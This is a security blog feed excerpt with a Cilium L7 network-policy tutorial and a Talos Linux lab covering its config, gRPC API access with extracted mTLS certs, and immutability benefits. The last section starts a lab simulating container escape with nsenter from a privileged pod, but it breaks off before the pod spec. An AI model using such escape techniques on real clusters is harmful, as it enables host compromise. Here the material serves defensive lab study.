<pre><code class="lang-bash">http://&lt;control-plane-node-ip&gt;:31080
</code></pre>
<p>That’ll launch the UI dashboard. You’ll start seeing live flow logs:</p>
<ul>
<li><p><strong>FORWARDED</strong> — allowed by policy</p>
</li>
<li><p><strong>DROPPED</strong> — denied by policy</p>
</li>
<li><p>With full context: source → destination, protocol, port, and verdict.</p>
</li>
</ul>
<h3 id="heading-step-3-validate-our-flows">Step 3: Validate Our Flows</h3>
<p>Now generate some traffic from the frontend namespace:</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~/blog$ kubectl -n frontend run <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sI http://api.backend.svc.cluster.local
HTTP/1.1 200 OK
Server: nginx/1.27.5
Date: Tue, 07 Oct 2025 03:25:44 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Wed, 16 Apr 2025 12:55:34 GMT
Connection: keep-alive
ETag: "67ffa8c6-267"
Accept-Ranges: bytes

test:~# dig +short google.com
142.251.46.238
test:~# nc -vz postgres.db.svc.cluster.local 5432
^C</span>
</code></pre>
<p>Back in Hubble, you’ll see some forwarded and some dropped as expected:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1759807764715/402a9985-cdd3-4a48-93bf-88ae6b14845d.png" alt class="image--center mx-auto" /></p>
<p>That’s Cilium showing you every flow in the <code>frontend</code> namespace. The graphics are not too bad as well. Easy as you like it.</p>
<hr />
<h2 id="heading-l7-enforcement">L7 Enforcement</h2>
<p>By now, we’ve seen Cilium handle L3/L4 segmentation cleanly. But the cool kid stuff is <strong>application-aware enforcement</strong>. It can look <em>inside</em> packets to understand requests by method and path. No sidecars, no service mesh, no YAML sorcery. Just a native policy that says: <em>allow</em> <code>GET /healthz</code>, block <code>POST /admin</code>.</p>
<h3 id="heading-why-l7">Why L7?</h3>
<p>With Calico, policies stopped at “TCP 80 from frontend to backend.” With Cilium, we can go further — controlling traffic by HTTP method, path, etc. That bridges the gap between <em>network isolation</em> and <em>API protection.</em></p>
<h3 id="heading-step-1-create-an-l7-aware-policy">Step 1: Create an L7-Aware Policy</h3>
<p>Let's simply update our existing <code>cnp-front-to-back.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">front-egress-to-back</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span> {}
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">toEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">backend</span>
            <span class="hljs-attr">"k8s:app":</span> <span class="hljs-string">api</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"80"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">rules:</span>
            <span class="hljs-attr">http:</span> [{}]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cilium.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CiliumNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">back-ingress-from-front</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">endpointSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">k8s:app:</span> <span class="hljs-string">api</span>
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">fromEndpoints:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">"k8s:io.kubernetes.pod.namespace":</span> <span class="hljs-string">frontend</span>
      <span class="hljs-attr">toPorts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-string">"80"</span>
              <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">rules:</span>
            <span class="hljs-attr">http:</span> [{}]
</code></pre>
<p>We've just added the rules section below our ports. Simple. This is not to change anything with regards to allowed flows, but rather give us L7 visibility.</p>
<pre><code class="lang-yaml">          <span class="hljs-attr">rules:</span>
            <span class="hljs-attr">http:</span> [{}]
</code></pre>
<p>Apply and test traffic from your frontend namespace:</p>
<pre><code class="lang-bash">matt@ciliumcontrolplane:~$  kubectl -n frontend run <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl http://api.backend.svc.cluster.local/
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Welcome to nginx!&lt;/h1&gt;
&lt;p&gt;If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.&lt;/p&gt;

&lt;p&gt;For online documentation and support please refer to
&lt;a href="http://nginx.org/"&gt;nginx.org&lt;/a&gt;.&lt;br/&gt;
Commercial support is available at
&lt;a href="http://nginx.com/"&gt;nginx.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;/em&gt;&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;
test:~# curl http://api.backend.svc.cluster.local/h
&lt;html&gt;
&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;center&gt;&lt;h1&gt;404 Not Found&lt;/h1&gt;&lt;/center&gt;
&lt;hr&gt;&lt;center&gt;nginx/1.27.5&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;
test:~#</span>
</code></pre>
<p>The first call should succeed. The second returns a <code>404</code>. So let's look at Hubble (ignore the double frontend).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1759815123454/0fb2c320-1864-4e8d-87e2-f5a35ab05c7c.png" alt class="image--center mx-auto" /></p>
<p>L7 policies turn Kubernetes from <em>ports and IPs</em> into <em>users and intent</em>.  Instead of treating every HTTP request equally, Cilium gives you relevant info. In our case we just see some Get requests with the specific endpoint, but that is actually pretty useful.</p>
<hr />
<h2 id="heading-wrapping-up-cilium">Wrapping Up Cilium</h2>
<p>I've just scratched the surface with Cilium, so I'll revisit it in the future. But, the Cilium lab shows what happens when you bring intent and observability into the mix. It understands what's being said. By combining kernel-level eBPF hooks with L7 awareness, you get clarity.</p>
<p>If Calico was about scaling guardrails, Cilium is about seeing and understanding them in real time. You can trace every flow, correlate it to a policy, and confirm that what’s allowed is actually what you meant to allow.</p>
<p>My Key takeaways:</p>
<ul>
<li><p>L7 visibility: HTTP and DNS insight without the overhead of a service mesh.</p>
</li>
<li><p>Hubble: observability built-in, not bolted on.</p>
</li>
</ul>
<p>Cilium brings a lot of value.</p>
<hr />
<h2 id="heading-ready-to-forget-networkpolicy">Ready to Forget <code>NetworkPolicy</code></h2>
<p>Three parts, three layers of understanding:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Layer</td><td>Tool</td><td>Scope</td><td>What It Taught Us</td></tr>
</thead>
<tbody>
<tr>
<td>L3/L4</td><td>NetworkPolicy</td><td>Namespace</td><td>Basic segmentation</td></tr>
<tr>
<td>L3–L4+</td><td>Calico</td><td>Cluster</td><td>Global guardrails + visibility</td></tr>
<tr>
<td>L3–L7</td><td>Cilium</td><td>Kernel</td><td>Context-aware enforcement + observability</td></tr>
</tbody>
</table>
</div><p>Kubernetes service boundaries aren’t about walls. NetworkPolicy gave us the foundation. Calico helped us scale it. Cilium made it slightly more intelligent. That's a wrap for now.</p>
]]></content:encoded></item><item><title><![CDATA[Talos Linux: Simplifying Kubernetes with Minimalist OS]]></title><description><![CDATA[There’s a certain chaos to most container hosts — which may excite security vendors, but it’s far from ideal in practice. You start with good intentions: run a few workloads, install some debugging tools, tweak a config or two. Before long, your supp...]]></description><link>https://cloudsecburrito.com/talos-linux-simplifying-kubernetes-with-minimalist-os</link><guid isPermaLink="true">https://cloudsecburrito.com/talos-linux-simplifying-kubernetes-with-minimalist-os</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[talos-linux]]></category><category><![CDATA[immutable]]></category><category><![CDATA[Linux]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Tue, 16 Sep 2025 22:47:31 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1758058547305/a73da6d3-ad76-44e1-8367-0ad5144a3822.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>There’s a certain chaos to most container hosts — which may excite security vendors, but it’s far from ideal in practice. You start with good intentions: run a few workloads, install some debugging tools, tweak a config or two. Before long, your supposedly “minimal” server is a mess of who-knows-what — a setup that almost always ends up demolishing your lab. And that’s without even touching on how permissive and exposed most container hosts are by default, lighting up security tests.</p>
<p>Sound familiar? I wrote this exact same intro when I looked at <a target="_blank" href="https://cloudsecburrito.com/immutable-minimal-and-actually-useful-meet-flatcar">Flatcar</a>. Now we’re back with our second contender for a minimal OS: <strong>Talos Linux</strong>.  </p>
<p>Talos isn’t a “Linux with Kubernetes on top” story. It’s an <strong>immutable operating system built solely for Kubernetes</strong>. No shell. No SSH. No <code>apt install</code>. Every change is declarative, version-controlled (or at least it should be), and API-driven. The goal is simple: eliminate snowflake nodes and replace them with a repeatable, locked-down blueprint.  </p>
<p>Yes, you can boot it in a toy lab and have NGINX running in minutes. But the real reason Talos stands out is what it <em>refuses</em> to let you do. By stripping away the usual clutter of a Linux host, Talos pushes Kubernetes operators into a world of zero drift, reproducible state, and a dramatically reduced attack surface.  </p>
<p>This post isn’t about a “hello world” demo (though we’ll include one). It’s about why Talos makes a compelling foundation for a serious Kubernetes security posture.  </p>
<hr />
<h2 id="heading-talos-linux-lab">Talos Linux Lab</h2>
<h3 id="heading-1-prereqs">1. Prereqs</h3>
<ul>
<li><strong>UTM</strong> installed (<a target="_blank" href="https://mac.getutm.app/">https://mac.getutm.app/</a>)  </li>
<li><strong>Homebrew</strong> with <code>talosctl</code> installed:  <pre><code class="lang-bash">brew install siderolabs/tap/talosctl
</code></pre>
</li>
<li><strong>Talos ISO</strong> downloaded:  <ul>
<li><a target="_blank" href="https://github.com/siderolabs/talos/releases/latest">Talos GitHub Releases</a>  </li>
<li>Use <code>metal-arm64.iso</code> for Apple Silicon  </li>
</ul>
</li>
</ul>
<h3 id="heading-2-create-the-vm-in-7-steps">2. Create the VM in 7 Steps</h3>
<ol>
<li>Open <strong>UTM → Create New VM</strong>  </li>
<li>Choose <strong>Virtualize → Linux</strong>  </li>
<li>Linux - Browse to <code>metal-arm64.iso</code></li>
<li>Hardware - Leave default</li>
<li>Storage - Leave default</li>
<li>Shared Directory - Leave default</li>
<li>Name the VM <code>Talos-Controlplane</code>.  </li>
</ol>
<h3 id="heading-3-boot-into-maintenance-mode">3. Boot into Maintenance Mode</h3>
<ul>
<li>Start the VM → Talos boots to <strong>maintenance mode</strong> (no shell, just logs).  </li>
<li>Talos is waiting for you to send a machine config.  </li>
<li>Note the VM’s IP address (you’ll need it for <code>talosctl</code>).  </li>
</ul>
<h3 id="heading-4-generate-a-config">4. Generate a Config</h3>
<p>Start by assigning the IP address to an environment variable. My IP is below:</p>
<pre><code class="lang-bash">`<span class="hljs-built_in">export</span> CONTROL_PLANE_IP=192.168.64.14`
</code></pre>
<p>Then grab the disk name and assign it to a variable. Mine is <code>vda</code>:</p>
<pre><code class="lang-bash">matt.brown@matt Talos % talosctl get disks --insecure --nodes <span class="hljs-variable">$CONTROL_PLANE_IP</span>
NODE            NAMESPACE   TYPE   ID      VERSION   SIZE    READ ONLY   TRANSPORT   ROTATIONAL   WWID   MODEL         SERIAL
192.168.64.14   runtime     Disk   loop0   2         66 MB   <span class="hljs-literal">true</span>
192.168.64.14   runtime     Disk   sr0     4         0 B     <span class="hljs-literal">false</span>       usb                             QEMU CD-ROM
192.168.64.14   runtime     Disk   vda     2         69 GB   <span class="hljs-literal">false</span>       virtio      <span class="hljs-literal">true</span>
matt.brown@matt Talos % <span class="hljs-built_in">export</span> DISK_NAME=vda
</code></pre>
<p>Choose any cluster name:</p>
<pre><code class="lang-bash">matt.brown@matt Talos % <span class="hljs-built_in">export</span> CLUSTER_NAME=talos_cluster
</code></pre>
<p>Then run the following to generate your config:</p>
<pre><code class="lang-bash">talosctl gen config <span class="hljs-variable">$CLUSTER_NAME</span> https://<span class="hljs-variable">$CONTROL_PLANE_IP</span>:6443 --install-disk /dev/<span class="hljs-variable">$DISK_NAME</span>
</code></pre>
<p>Now edit <code>controlplane.yaml</code> with your network. In my environment if I didn't change it then my DNS endlessly failed on reboot of the cluster controlplane node. <code>eth0</code> should work and of course your <code>gateway</code> and <code>address</code> will depend on your machine.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">machine:</span>
    <span class="hljs-attr">network:</span>
    <span class="hljs-comment"># # `interfaces` is used to define the network interface configuration.</span>
      <span class="hljs-attr">interfaces:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">interface:</span> <span class="hljs-string">eth0</span>
        <span class="hljs-attr">addresses:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-number">192.168</span><span class="hljs-number">.64</span><span class="hljs-number">.14</span><span class="hljs-string">/24</span>
        <span class="hljs-attr">routes:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">network:</span> <span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span><span class="hljs-string">/0</span>
          <span class="hljs-attr">gateway:</span> <span class="hljs-number">192.168</span><span class="hljs-number">.64</span><span class="hljs-number">.1</span>
      <span class="hljs-attr">nameservers:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-number">1.1</span><span class="hljs-number">.1</span><span class="hljs-number">.1</span>
        <span class="hljs-bullet">-</span> <span class="hljs-number">8.8</span><span class="hljs-number">.8</span><span class="hljs-number">.8</span>
</code></pre>
<h3 id="heading-5-apply-config-and-stuff">5. Apply Config and Stuff</h3>
<p>Now we are ready to apply it. Send the config in insecure mode (first contact):  </p>
<pre><code class="lang-bash">talosctl apply-config --insecure --nodes <span class="hljs-variable">$CONTROL_PLANE_IP</span> --file controlplane.yaml
</code></pre>
<p>Talos wipes the disk, installs itself, and reboots into normal mode. Might take a bit of time.</p>
<p>Follow up by adding the endpoint:</p>
<pre><code class="lang-bash">talosctl --talosconfig=./talosconfig config endpoints <span class="hljs-variable">$CONTROL_PLANE_IP</span>
</code></pre>
<p>Then go ahead and fire up <code>etcd</code>.</p>
<pre><code class="lang-bash">talosctl bootstrap --nodes <span class="hljs-variable">$CONTROL_PLANE_IP</span> --talosconfig=./talosconfig
</code></pre>
<h3 id="heading-6-bootstrap-kubernetes">6. Bootstrap Kubernetes</h3>
<p>Now we're ready to generate our <code>kubeconfig</code>:</p>
<pre><code class="lang-bash">talosctl kubeconfig alternative-kubeconfig --nodes <span class="hljs-variable">$CONTROL_PLANE_IP</span> --talosconfig=./talosconfig
<span class="hljs-built_in">export</span> KUBECONFIG=./alternative-kubeconfig
</code></pre>
<p>Check cluster:  </p>
<pre><code class="lang-bash">matt.brown@matt Talos % kubectl get pods -A
NAMESPACE     NAME                                    READY   STATUS    RESTARTS     AGE
kube-system   coredns-54874b5f94-9d2k9                1/1     Running   0            47h
kube-system   coredns-54874b5f94-zgmzz                1/1     Running   0            47h
kube-system   kube-apiserver-talos-sxp-dta            1/1     Running   0            9h
kube-system   kube-controller-manager-talos-sxp-dta   1/1     Running   3 (9h ago)   9h
kube-system   kube-flannel-64n8t                      1/1     Running   0            47h
kube-system   kube-proxy-67l7n                        1/1     Running   0            47h
kube-system   kube-scheduler-talos-sxp-dta            1/1     Running   4 (9h ago)   9h
</code></pre>
<p>You’ll see <code>coredns</code>, <code>kube-apiserver</code>, <code>kube-flannel</code>, <code>kube-proxy</code>,  and <code>kube-scheduler</code>.  Everything is set, even your CNI.</p>
<h3 id="heading-7-run-workloads">7.  Run Workloads</h3>
<p>Untaint the control plane so it can host Pods:  </p>
<pre><code class="lang-bash">kubectl taint nodes --all node-role.kubernetes.io/control-plane-
</code></pre>
<p>Deploy nginx:  </p>
<pre><code class="lang-bash">kubectl create deployment nginx --image=nginx:stable --replicas=2
kubectl expose deployment nginx --port=80 --<span class="hljs-built_in">type</span>=NodePort
kubectl get svc nginx
</code></pre>
<p>Curl from your Mac:  </p>
<pre><code class="lang-bash">curl http://192.168.64.14:&lt;NodePort&gt;
</code></pre>
<p>Hell yeah. Kubernetes the easy way.</p>
<h3 id="heading-recap">Recap</h3>
<ul>
<li>Boot Talos ISO in UTM → node sits in maintenance.  </li>
<li>Generate &amp; apply machine config → installs Talos.  </li>
<li>Bootstrap → Kubernetes up with Flannel.  </li>
<li>Untaint → run nginx or any workload.  </li>
</ul>
<p>A clean, repeatable, single-node Kubernetes cluster in UTM.</p>
<hr />
<h2 id="heading-a-look-underneath-the-hood-of-talosctl">A look underneath the hood of <code>talosctl</code></h2>
<p>One of the most obvious realizations about Talos is that <strong><code>talosctl</code> is not special</strong>. It’s just a thin CLI wrapper over the <a target="_blank" href="https://www.talos.dev/v1.11/reference/api/">Talos <strong>gRPC API</strong></a>. If you strip away the friendly command names, what’s left is a clean, strongly-typed API exposed by every node on port <code>50000</code>.</p>
<h3 id="heading-the-talos-api-in-a-nutshell">The Talos API in a Nutshell</h3>
<ul>
<li><strong>Transport:</strong> gRPC over HTTP/2  </li>
<li><strong>Auth:</strong> Mutual TLS </li>
<li><strong>Port:</strong> <code>50000/tcp</code> on every node  </li>
<li><strong>Schemas:</strong> Public <code>.proto</code> definitions available at <a target="_blank" href="https://github.com/siderolabs/talos/tree/main/api">siderolabs/talos/api</a>  </li>
</ul>
<p>So <code>talosconfig</code> file is really just the Kubernetes <code>kubeconfig</code> equivalent:</p>
<ul>
<li>Stores your CA, client cert, and key</li>
<li>Defines endpoints and nodes</li>
<li>Lets clients establish trust via mTLS</li>
</ul>
<h3 id="heading-why-bother">Why Bother?</h3>
<p>As usual there is not a strong case to be made, but we like to understand the underpinnings of our tooling. Here are some possible ideas:</p>
<ul>
<li><strong>Custom automation:</strong> call Talos directly from Python apps.</li>
<li><strong>Integration:</strong> wire Talos into CI/CD flows without needing to shell out to <code>talosctl</code>.</li>
<li><strong>Observability/UI:</strong> build a dashboard or controller that queries node state (<code>disks</code>, <code>services</code>, <code>time</code>) and does stuff.</li>
</ul>
<h3 id="heading-example-grpcurl">Example: <code>grpcurl</code></h3>
<p>With the certs in your <code>talosconfig</code>, you can hit the API directly. You can install <code>gpgcurl</code> and <code>yq</code> via <code>brew</code> if you're on a Mac.</p>
<p>A brief explanation of the above:</p>
<ul>
<li>Export your Talos node IP as an environment variable.  </li>
<li>Use <code>yq</code> to pull the <strong>CA cert</strong>, <strong>client cert</strong>, and <strong>client key</strong> out of your <code>talosconfig</code> and write them to a local folder.  </li>
<li>Set file permissions so the client key is not world-readable.  </li>
<li>Clone the Talos repo to grab the compiled <code>.proto</code> definitions (or use the included <code>api/lock.binpb</code>).  </li>
<li>Run <code>grpcurl</code> with your certs and keys against port <code>50000</code> on the Talos node to query the gRPC API (e.g., <code>machine.MachineService.DiskStats</code>).  </li>
</ul>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> TALOS_NODE=192.168.64.14

CONF=./talosconfig
CTX=talos_cluster
OUT=./talos-certs-2

mkdir -p <span class="hljs-string">"<span class="hljs-variable">$OUT</span>"</span>

<span class="hljs-comment"># CA cert</span>
yq -r <span class="hljs-string">".contexts[\"<span class="hljs-variable">$CTX</span>\"].ca.crt // .contexts[\"<span class="hljs-variable">$CTX</span>\"].ca"</span> <span class="hljs-string">"<span class="hljs-variable">$CONF</span>"</span> | base64 -d &gt; <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/ca.crt"</span>

<span class="hljs-comment"># Client cert</span>
yq -r <span class="hljs-string">".contexts[\"<span class="hljs-variable">$CTX</span>\"].client.crt // .contexts[\"<span class="hljs-variable">$CTX</span>\"].crt"</span> <span class="hljs-string">"<span class="hljs-variable">$CONF</span>"</span> | base64 -d &gt; <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/client.crt"</span>

<span class="hljs-comment"># Client key</span>
yq -r <span class="hljs-string">".contexts[\"<span class="hljs-variable">$CTX</span>\"].client.key // .contexts[\"<span class="hljs-variable">$CTX</span>\"].key"</span> <span class="hljs-string">"<span class="hljs-variable">$CONF</span>"</span> | base64 -d &gt; <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/client.key"</span>

chmod 644 <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/ca.crt"</span> <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/client.crt"</span>
chmod 600 <span class="hljs-string">"<span class="hljs-variable">$OUT</span>/client.key"</span>

git <span class="hljs-built_in">clone</span> https://github.com/siderolabs/talos.git
<span class="hljs-built_in">cd</span> talos


grpcurl \
  -cacert <span class="hljs-string">"../<span class="hljs-variable">$OUT</span>/ca.crt"</span> \
  -cert   <span class="hljs-string">"../<span class="hljs-variable">$OUT</span>/client.crt"</span> \
  -key    <span class="hljs-string">"../<span class="hljs-variable">$OUT</span>/client.key"</span> \
  -protoset api/lock.binpb \
  <span class="hljs-variable">$TALOS_NODE</span>:50000 machine.MachineService.DiskStats
</code></pre>
<p>You should get something like the following:</p>
<pre><code class="lang-bash">...
        {
          <span class="hljs-string">"name"</span>: <span class="hljs-string">"vda"</span>,
          <span class="hljs-string">"readCompleted"</span>: <span class="hljs-string">"547"</span>,
          <span class="hljs-string">"readSectors"</span>: <span class="hljs-string">"14956"</span>,
          <span class="hljs-string">"readTimeMs"</span>: <span class="hljs-string">"167"</span>,
          <span class="hljs-string">"writeCompleted"</span>: <span class="hljs-string">"2782529"</span>,
          <span class="hljs-string">"writeMerged"</span>: <span class="hljs-string">"57361"</span>,
          <span class="hljs-string">"writeSectors"</span>: <span class="hljs-string">"20539233"</span>,
          <span class="hljs-string">"writeTimeMs"</span>: <span class="hljs-string">"2094027"</span>,
          <span class="hljs-string">"ioTimeMs"</span>: <span class="hljs-string">"1399624"</span>,
          <span class="hljs-string">"ioTimeWeightedMs"</span>: <span class="hljs-string">"2880919"</span>
        },
...
</code></pre>
<p>As we can see. Talos isn’t “locked behind a CLI.” The API is the product. <code>talosctl</code> is just the usual client. If you want to integrate Talos and not use the CLI or write your own admin tooling, you can do it.</p>
<hr />
<h2 id="heading-machine-config-as-code">Machine Config as Code</h2>
<p>Talos is the definition of <strong>immutable</strong>. The <strong>machine config</strong> is the source of truth. Instead of logging into a node and tweaking <code>/etc</code> or running <code>apt install</code>, you declare the <em>entire state of the node</em> in YAML. Talos enforces that state at boot and during runtime. </p>
<h3 id="heading-generating-the-config">Generating the Config</h3>
<p>You don’t write Talos configs by hand as we've seen. So quick recap.</p>
<p>They’re generated with <code>talosctl</code>:</p>
<pre><code class="lang-bash">talosctl gen config my-cluster https://&lt;CONTROL_PLANE_IP&gt;:6443
</code></pre>
<p>This gives you three files:</p>
<ul>
<li><code>controlplane.yaml</code> — config for Kubernetes control plane nodes.</li>
<li><code>worker.yaml</code> — config for worker nodes.</li>
<li><code>talosconfig</code> — client-side file with API certs and endpoints for <code>talosctl</code>.</li>
</ul>
<h3 id="heading-control-plane-vs-worker">Control Plane vs Worker</h3>
<p>Now we see we get two config files: <code>controlplane.yaml</code> and <code>worker.yaml</code>. The key difference is the <code>machine.type</code> field:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">machine:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">controlplane</span>   <span class="hljs-comment"># or "worker"</span>
</code></pre>
<ul>
<li><strong>Control plane nodes</strong> run the Kubernetes API server, scheduler, and controller manager.  </li>
<li><strong>Worker nodes</strong> join the cluster but don’t run control plane components.  </li>
</ul>
<p>Hey just Kubernetes. Of course in a single-node lab you only need <code>controlplane.yaml</code>.  In a real cluster you’d apply <code>controlplane.yaml</code> to your controlplane nodes and <code>worker.yaml</code> everywhere else. Simple.</p>
<h3 id="heading-what-lives-in-the-config">What Lives in the Config?</h3>
<p>A Talos machine config is the playbook for a node:</p>
<ul>
<li><strong>Installation details</strong> — which disk to wipe and install onto.</li>
<li><strong>Networking</strong> — DHCP or static IPs, routes, nameservers.</li>
<li><strong>Cluster wiring</strong> — control plane endpoint, certs.</li>
<li><strong>System knobs</strong> — kernel parameters, time servers, logging.</li>
<li><strong>Access control</strong> — API roles defined by certificates.</li>
</ul>
<p>Here is part of the config we generated for our lab <code>controlplane.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">machine:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">controlplane</span>
  <span class="hljs-attr">install:</span>
    <span class="hljs-attr">disk:</span> <span class="hljs-string">/dev/vda</span>
  <span class="hljs-attr">network:</span>
    <span class="hljs-attr">interfaces:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">interface:</span> <span class="hljs-string">eth0</span>
        <span class="hljs-attr">dhcp:</span> <span class="hljs-literal">true</span>
    <span class="hljs-attr">nameservers:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-number">1.1</span><span class="hljs-number">.1</span><span class="hljs-number">.1</span>
      <span class="hljs-bullet">-</span> <span class="hljs-number">8.8</span><span class="hljs-number">.8</span><span class="hljs-number">.8</span>
<span class="hljs-attr">cluster:</span>
  <span class="hljs-attr">controlPlane:</span>
    <span class="hljs-attr">endpoint:</span> <span class="hljs-string">https://192.168.64.14:6443</span>
</code></pre>
<h3 id="heading-declarative-changes">Declarative Changes</h3>
<p>You don’t SSH in and patch things. You:</p>
<ol>
<li>Update the YAML.</li>
<li>Re-apply it with <code>talosctl</code>.</li>
</ol>
<pre><code class="lang-bash">talosctl apply-config -n &lt;NODE_IP&gt; -f controlplane.yaml
</code></pre>
<p>The node reconciles itself against the new config, rebooting if necessary.</p>
<h3 id="heading-patching-vs-full-reapply">Patching vs Full Reapply</h3>
<p>For small tweaks, you don’t need to resend the whole config. Talos supports <strong>merge patches</strong>, much like Kubernetes:</p>
<pre><code class="lang-bash">talosctl apply-patch -n &lt;NODE_IP&gt; --patch @patch.yaml
</code></pre>
<p>Example patch (changing DNS):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">machine:</span>
  <span class="hljs-attr">network:</span>
    <span class="hljs-attr">nameservers:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-number">9.9</span><span class="hljs-number">.9</span><span class="hljs-number">.9</span>
</code></pre>
<p>This updates just the <code>nameservers</code> field without touching the rest.</p>
<h3 id="heading-drift-becomes-a-non-feature">Drift Becomes a Non-Feature</h3>
<p>With Talos, drift just… doesn’t exist. Nodes either match the declared config or they don’t boot properly. Consistency is the only way. The config is the <strong>authoritative spec for your node</strong>, API-enforced at runtime. Bam.</p>
<hr />
<h2 id="heading-security-posture-benefits">Security Posture Benefits</h2>
<p>So we have an OS that won’t let you <code>apt install</code> or <code>ssh</code> in when things break. What do we get? From a security perspective, we get gold. </p>
<p>These examples might be a bit generic, but you get the point:</p>
<h3 id="heading-smaller-attack-surface">Smaller Attack Surface</h3>
<p>There’s no SSH daemon to brute force, no shell to escape into, no random debug tools left lying around.  Most of the usual entry points simply don’t exist.</p>
<h3 id="heading-no-runtime-drift">No Runtime Drift</h3>
<p>On a standard Linux host, persistence could unfold as follows: tweak <code>/etc/ssh/sshd_config</code>, drop a binary in <code>/usr/bin</code>, or install a package and you’ve changed the security model. On Talos, those directories are read-only at runtime. Anything outside of the declared machine config is wiped away on reboot.</p>
<h3 id="heading-enforced-consistency">Enforced Consistency</h3>
<p>With Talos, “configuration drift” isn’t a problem to detect later. Nodes either match the declared config or they don’t come up. That consistency makes it much harder for subtle misconfigurations or shadow changes to slip by unnoticed.</p>
<h3 id="heading-api-driven-access">API-Driven Access</h3>
<p>Every interaction is authenticated and encrypted via gRPC with mTLS. There’s no “shared root password” floating around or keys to rotate. </p>
<p>Talos doesn’t make your Kubernetes cluster magically invincible. But by stripping away the common Linux attack surface and enforcing immutability at the OS level, it closes off whole categories of compromise before they even start.</p>
<hr />
<h2 id="heading-container-escape-fallout">Container Escape Fallout</h2>
<p>I covered a container compromise path in my <a target="_blank" href="https://cloudsecburrito.com/when-yaml-fights-back-my-runtime-security-talk-at-bsides">BSides Las Vegas talk</a>. For this post we’ll skip straight to the next chapter: <strong>what happens after the escape, when the attacker lands on the host?</strong></p>
<p>The usual way to simulate this is with <code>nsenter</code> from a privileged container.</p>
<p>Save the following spec as <code>escape.yaml</code>. The pod spec is set to have the right config for container escape and to use an image that already has <code>nsenter</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
